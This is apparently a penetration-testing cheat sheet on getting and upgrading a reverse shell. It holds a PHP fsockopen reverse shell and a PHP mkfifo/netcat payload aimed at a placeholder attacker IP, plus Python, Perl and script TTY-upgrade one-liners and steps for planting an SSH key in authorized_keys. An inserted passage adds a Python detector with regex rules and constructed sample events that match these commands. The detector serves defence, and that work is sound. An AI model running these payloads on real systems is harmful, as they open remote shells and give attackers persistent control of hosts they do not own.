Upgrade Reverse Shell

Via interpreter

PHP

  • reverse shell
php -r '$sock=fsockopen("<attacker-IP>", <attacker-Port>);exec("/bin/sh -i <&3 >&3 2>&3");'
php -r 'exec("/bin/bash");'
  • Sometimes even
php -e 'exec "/bin/bash";'

Python

python -c 'import pty; pty.spawn("/bin/bash")'

Perl

perl -e 'exec "/bin/sh";'

Script

/usr/bin/script -qc /bin/bash /dev/null

or

script /dev/null -c bash

Next

  1. ctrl + z
  2. stty raw -echo
  3. fg
  4. export SHELL=bash
  5. export TERM=xterm
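
Detection-side view of the commands above, as an added example that is not part of the original page: the interpreter and `script` one-liners each create a process whose command line can be matched in process-creation telemetry (auditd EXECVE, Sysmon for Linux, EDR). The `user|parent|cmdline` event format, the rule names and the parent list are assumptions, and the sample events are constructed.

```python
import re

# Patterns for the PTY-upgrade command lines listed above, matched against
# the argv of a process-creation event (shell quoting already removed).
RULES = [
    ("python_pty_spawn", re.compile(r"\bpython[\d.]*\s+-c\s.*\bpty\.spawn\s*\(")),
    ("script_pty_shell", re.compile(r"(?:^|/)script\s.*-\w*c\s+\S*sh\b")),
    ("php_inline_exec", re.compile(r"\bphp[\d.]*\s+-r\s.*\b(?:fsockopen|exec)\s*\(")),
    ("perl_inline_exec", re.compile(r"\bperl\s+-e\s.*\bexec\s+\W?/bin/(?:ba)?sh")),
]

# Service parents that rarely have a reason to start these (assumption; tune per host).
SERVICE_PARENTS = {"apache2", "httpd", "nginx", "php-fpm", "java", "node"}

def classify(parent, cmdline):
    """Return (rule_name, severity) for one process-creation event, or None."""
    for name, rx in RULES:
        if rx.search(cmdline):
            sev = "high" if parent in SERVICE_PARENTS else "medium"
            return name, sev
    return None

def scan(lines):
    """Parse 'user|parent|cmdline' lines (constructed format) and return alerts."""
    alerts = []
    for line in lines:
        user, parent, cmdline = line.split("|", 2)
        hit = classify(parent, cmdline)
        if hit:
            alerts.append((user, parent) + hit)
    return alerts

# Constructed sample events, not captured from a real host.
SAMPLE = [
    'www-data|apache2|python -c import pty; pty.spawn("/bin/bash")',
    'www-data|sh|/usr/bin/script -qc /bin/bash /dev/null',
    'www-data|sh|script /dev/null -c bash',
    'alice|bash|script session.log',
    'deploy|bash|python3 -c print(1)',
    'www-data|php-fpm|perl -e exec "/bin/sh";',
    'www-data|apache2|php -r exec("/bin/bash");',
    'bob|bash|php -r echo phpversion();',
]

if __name__ == "__main__":
    for alert in scan(SAMPLE):
        print(alert)
```

The `ctrl + z`, `stty` and `fg` steps are typed into the operator's own terminal and the `export` lines are shell builtins, so none of them produce a process event on the target; the interpreter or `script` invocation is the observable part.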

Via SSH

  • ssh-keygen
  • copy private key and chmod 600
  • cat id_rsa.pub > authorized_keys on target

As Code

PHP

<?php exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <attacker-IP> <attacker-PORT> > /tmp/f') ?>